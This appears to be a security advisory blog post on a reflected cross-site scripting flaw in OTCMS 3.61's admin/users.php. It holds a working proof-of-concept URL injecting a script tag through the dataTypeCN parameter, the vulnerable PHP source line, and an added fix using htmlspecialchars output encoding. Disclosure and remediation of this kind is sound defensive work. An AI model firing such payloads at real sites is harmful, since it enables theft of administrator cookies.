Sunday, September 16, 2018

OTCMS 3.61 reflected XSS (/users.php)


Description

An issue was discovered in OTCMS 3.61.
XSS exists in admin/users.php via the parameters:
dataTypeCN
dataMode
dataModeStr


Impact: the XSS vulnerability can be used to obtain the administrator's cookie or to deliver other XSS payloads.


Example

Take the dataTypeCN parameter as an example.

A payload that triggers the reflected XSS in the dataTypeCN parameter:

http://10.211.55.4/admin/users.php?mudi=online&dataType=&dataTypeCN=%e5%9c%a8%e7%ba%bf%e4%bc%9a%e5%91%98g4ql8%22%3e%3cscript%3ealert(1)%3c%2fscript%3ezvx9q

Cross-site scripting (reflected)

The value of the dataTypeCN request parameter is copied into the value of an HTML tag attribute that is enclosed in double quotation marks. The payload g4ql8"><script>alert(1)</script>zvx9q was submitted in the dataTypeCN parameter. This input was echoed as g4ql8\"><script>alert(1)</script>zvx9q in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Affected files

admin/users.php source code (line 160):

echo('<form id="dealForm" name="dealForm" method="post" action="users_deal.php?mudi='. $mudi .'&nohrefStr=close" onsubmit="return CheckForm()"><input type="hidden" id="dataType" name="dataType" value="'. $dataType .'" /><input type="hidden" id="dataTypeCN" name="dataTypeCN" value="'. $dataTypeCN .'" /><input type="hidden" id="dataMode" name="dataMode" value="'. $dataMode .'" /><input type="hidden" id="dataModeStr" name="dataModeStr" value="'. $dataModeStr .'" /><input type="hidden" id="dataID" name="dataID" value="'. $dataID .'" />');
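The line above builds the form by concatenating request values straight into double-quoted attributes. The backslash in the echoed response (g4ql8\"…) indicates that some slash-style escaping was applied, but a backslash has no meaning to an HTML parser, so the double quote still terminates the attribute. The fix is context-correct output encoding. The following is an added example, not OTCMS code: it rebuilds the same markup with htmlspecialchars() in ENT_QUOTES mode and only emits the parameters the page expects. The function names (attr, renderDealForm) and the sample input array are assumptions made for this example.

```php
<?php
// Added example (not OTCMS code): the hidden-input form from admin/users.php,
// rebuilt with context-correct output encoding.

// Encode a value for use inside a double-quoted HTML attribute.
// ENT_QUOTES encodes both " and ', so the value can never terminate the attribute;
// ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Render the form from a fixed list of expected parameter names.
// Unknown parameters are ignored rather than reflected into the page.
function renderDealForm(array $request): string
{
    $fields = ['dataType', 'dataTypeCN', 'dataMode', 'dataModeStr', 'dataID'];

    // $mudi ends up in a URL inside an attribute: URL-encode for the query
    // string first, then attribute-encode the whole action value.
    $mudi   = isset($request['mudi']) ? (string) $request['mudi'] : '';
    $action = 'users_deal.php?mudi=' . rawurlencode($mudi) . '&nohrefStr=close';

    $html = '<form id="dealForm" name="dealForm" method="post" action="' . attr($action)
          . '" onsubmit="return CheckForm()">';
    foreach ($fields as $name) {
        $value = isset($request[$name]) ? (string) $request[$name] : '';
        $html .= sprintf('<input type="hidden" id="%1$s" name="%1$s" value="%2$s" />',
                         $name, attr($value));
    }
    return $html . '</form>';
}

// Constructed sample input: the payload quoted in the advisory plus normal values.
$sample = [
    'mudi'       => 'online',
    'dataTypeCN' => 'g4ql8"><script>alert(1)</script>zvx9q',
    'dataMode'   => 'online',
];

// addslashes() only prefixes a backslash, which the browser's HTML parser ignores,
// so the quote still closes the attribute. The encoded form keeps the whole value
// inside the attribute: g4ql8&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;zvx9q
echo "addslashes:       " . addslashes($sample['dataTypeCN']) . "\n";
echo "htmlspecialchars: " . attr($sample['dataTypeCN']) . "\n";
echo renderDealForm($sample) . "\n";
```

Run it with `php example.php` and compare the two encoded lines: the addslashes() output still contains a literal `"` followed by `>`, while the htmlspecialchars() output contains neither, which is what prevents the attribute from being closed early. The same attr() helper should be applied to every value echoed into an attribute on the page, including the other two parameters named in this advisory.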
